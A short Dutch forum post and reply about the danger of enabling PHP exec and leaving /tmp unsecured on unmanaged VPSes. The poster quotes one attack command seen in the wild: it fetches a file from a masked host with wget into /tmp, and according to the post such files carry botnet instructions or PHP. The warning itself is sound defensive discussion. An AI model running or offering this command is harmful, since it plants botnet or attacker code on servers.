Is het een idee om een centraal statement te maken, iets zoals ook voor IE 6 gemaakt is?
Zeker als je exec aan hebt staan (niet doen dus) en bijvoorbeeld /tmp niet beveiligd hebt... omdat je zeg maar een niet managed VPS ergens hebt... dan is het echt aftellen voordat er hele enge dingen gebeuren...
Klein voorbeeldje -> sh -c cd /tmp ; /usr/bin/wget -t0 -c http://XXXXX:82/293/d/sess_XXX 1> /dev/null 2> /dev/null && echo OK
En in die session file zit dan instructie voor het botnet, of een stukje PHP, dat ben ik ook al tegen gekomen.

Likes:


Quote
Het verbaasde me juist dat we weer iets meer in /tmp lijken tegen te komen.
